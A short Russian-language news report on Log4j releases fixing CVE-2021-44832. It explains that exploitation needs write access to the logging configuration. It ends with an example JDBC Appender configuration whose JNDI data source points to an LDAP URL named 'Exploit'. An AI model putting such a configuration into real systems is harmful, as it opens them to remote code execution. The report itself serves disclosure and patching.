Опубликованы корректирующие выпуски библиотеки Log4j 2.17.1, 2.3.2-rc1 и 2.12.4-rc1, в которых устранена ещё одна уязвимость (CVE-2021-44832). Упоминается, что проблема позволяет организовать удалённое выполнение кода (RCE), но при этом помечена как неопасная (CVSS Score 6.6) и в основном представляет лишь теоретический интерес, так как требует специфичных условий для эксплуатации — атакующий должен иметь возможность внести изменение в файл с настройками Log4j, т.е. должен иметь доступ к атакуемой системе и полномочия изменять значение параметра конфигурации log4j2.configurationFile или вносить изменения в существующие файлы c настройками для ведения лога.
Атака сводится к определению на локальной системе конфигурации на базе JDBC Appender, ссылающейся на внешний JNDI URI, при запросе которого может быть возвращён Java-класс для исполнения. По умолчанию JDBC Appender не настроен для обработки протоколов, отличных от Java, т.е. без изменения конфигурации атака невозможна. Кроме того, проблема проявляется только в JAR-файле log4j-core и не затрагивает приложения, использующие JAR-файл log4j-api без log4j-core. <Appenders> <JDBC name=»databaseAppender» tableName=»dbo.application_log»> <DataSource jndiName=»ldap://127.0.0.1:1389/Exploit»/> … </JDBC> </Appenders>
Источник: opennet.ru